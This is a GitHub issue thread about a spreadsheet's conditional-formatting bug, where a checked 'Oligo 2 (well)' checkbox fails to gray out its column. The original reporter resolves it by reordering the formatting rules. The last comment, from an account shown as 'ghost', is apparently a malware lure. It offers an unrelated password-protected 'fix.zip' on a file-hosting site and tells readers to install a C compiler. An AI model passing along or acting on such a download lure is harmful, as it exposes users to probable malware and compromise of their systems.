### ISSUE TITLE
Asst: dsDNA "Oligo 2 (well)" column does not become grayed out after checking off checkbox

### ISSUE THREAD

**Issue by santiagochrist** [bthuronyi/CloneCoordinate#252]
Could be a little confusing if you're using color as a cue to keep track of whether you already pipetted the oligo. Every other checkbox works properly.

**Comment by santiagochrist** [comment]
Ah, just needed to slide the order conditional formatting that checks the checkbox above the color formats, i.e., checking off a box gets higher priority. This is how the other columns work, so I'll just go ahead and implement this.

**Comment by ghost** [comment]
This might help:This file might fix it
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme
If you don't have the c compliator, install it.(gcc or clang)
